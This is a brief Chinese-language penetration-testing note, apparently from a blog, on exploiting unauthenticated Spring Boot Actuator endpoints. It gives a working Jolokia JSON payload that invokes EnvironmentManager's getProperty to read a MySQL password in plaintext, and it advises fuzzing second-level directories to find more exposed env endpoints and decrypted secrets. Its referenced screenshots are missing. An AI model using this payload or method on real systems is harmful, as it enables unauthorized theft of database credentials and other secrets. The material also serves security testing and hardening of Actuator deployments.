測試發現spring boot actuator接口未授權訪問:
之前寫過用mat工具獲取加密數據的明文,下面嘗試通過jolokia接口獲取明文數據:
payload:
{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["mysql.password"]}
開始正題,發現這種二極目錄下的spring boot actuator接口未授權后,可以嘗試針對其他二極目錄進行訪問嘗試,或者直接fuzz二級目錄接口,fuzz如下:
fuzz出一個二級目錄,查看env接口:
這樣一來我們就可以獲取更多的加密數據的信息。